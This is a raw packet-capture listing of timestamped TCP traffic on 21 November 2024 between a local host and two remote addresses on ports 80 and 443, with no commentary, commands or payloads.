                                                                                                                                                                                                            Nov 21, 2024 15:17:36.010247946 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.010283947 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.010329962 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.011037111 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.011073112 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.011171103 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.011715889 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.011766911 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.011889935 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.012443066 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.012484074 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.012526989 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.013166904 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.013199091 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.013206005 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.013906956 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.013945103 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.013983011 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.014611959 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.014650106 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.014745951 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.015328884 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.015367031 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.015419960 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.016041994 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.016079903 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.016196012 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.016788006 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.016875982 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.016908884 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.017507076 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.017555952 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.017627001 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.018233061 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.018282890 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.018337965 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.019007921 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.019076109 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.019113064 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.019740105 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.019795895 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.019828081 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.020441055 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.020483017 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.020529032 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.021173954 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.021218061 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.021259069 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.021939039 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.022028923 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.022142887 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.022608995 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.022701025 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.022705078 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.023351908 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.023391008 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.023443937 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.024110079 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.024168015 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.024199009 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.024817944 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.024854898 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.024893045 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.025532961 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.025573969 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.025604963 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.026268959 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.026309013 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.026381016 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.026958942 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.026997089 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.027069092 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.027709961 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.027745962 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.027805090 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.028433084 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.028470993 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.028531075 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.028902054 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.029149055 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.029186964 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.029256105 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.029901028 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.029999018 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.030042887 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.030697107 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.030734062 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.030834913 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.031347990 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.031475067 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.031511068 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.032073021 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.032119036 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.032182932 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.032810926 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.032850981 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.032915115 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.033544064 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.033581972 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.033642054 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.034265041 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.034317017 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.034362078 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.035093069 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.035132885 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.035213947 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.035733938 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.035773039 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.035832882 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.036463022 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.036500931 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.036566973 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.037189007 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.037226915 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.037229061 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.037905931 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.037952900 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.038038015 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.038635015 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.038675070 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.039390087 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.039402008 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.039413929 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.039438963 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.040291071 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.040333986 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.040385008 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.093249083 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.150068998 CET4434978113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.150137901 CET4434978113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.150237083 CET49781443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.150424004 CET49781443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.150446892 CET4434978113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.150460005 CET49781443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.150465965 CET4434978113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.153160095 CET49786443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.153202057 CET4434978613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.153275013 CET49786443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.153414011 CET49786443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.153424025 CET4434978613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.212279081 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.213568926 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.213670969 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.213716030 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.213951111 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.214112043 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.214158058 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.214611053 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.214724064 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.214767933 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.215446949 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.215538025 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.215581894 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.216057062 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.216176987 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.216212988 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.216790915 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.216861010 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.216897964 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.217503071 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.217643976 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.217683077 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.217948914 CET4434978213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.218014956 CET4434978213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.218190908 CET49782443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.218190908 CET49782443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.218215942 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.218296051 CET49782443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.218308926 CET4434978213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.218322039 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.218522072 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.218997955 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.219065905 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.219666958 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.219768047 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.220396996 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.220418930 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.220530987 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.220644951 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.220865011 CET49787443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.220901966 CET4434978713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.221126080 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.221138954 CET49787443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.221138954 CET49787443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.221165895 CET4434978713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.221234083 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.221273899 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.221843004 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.221956015 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.221996069 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.222709894 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.222815990 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.222857952 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.223377943 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.223499060 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.223537922 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.224051952 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.224154949 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.224195004 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.224729061 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.224889040 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.224961996 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.225492954 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.225598097 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.225637913 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.226237059 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.226444006 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.226484060 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.226946115 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.227072001 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.227109909 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.227652073 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.227767944 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.227806091 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.228429079 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.228518963 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.228558064 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.229167938 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.229279041 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.229320049 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.229876041 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.230009079 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.230046988 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.230585098 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.230714083 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.230751991 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.231331110 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.231477976 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.231518030 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.232043028 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.232146978 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.232183933 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.232800961 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.232903957 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.232952118 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.233496904 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.233611107 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.233685970 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.234232903 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.234349012 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.234394073 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.234972954 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.235091925 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.235132933 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.235727072 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.235862017 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.236059904 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.236439943 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.236617088 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.236654043 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.237194061 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.237288952 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.237327099 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.237911940 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.237960100 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.237998009 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.238600969 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.238692999 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.238732100 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.239341021 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.239486933 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.239526987 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.240055084 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.240189075 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.240259886 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.240792036 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.240952015 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.241038084 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.241517067 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.241658926 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.241919041 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.242233038 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.242357016 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.242505074 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.242953062 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.243115902 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.243163109 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.243688107 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.243799925 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.243839025 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.244437933 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.244519949 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.244556904 CET4977880192.168.2.6185.215.113.16
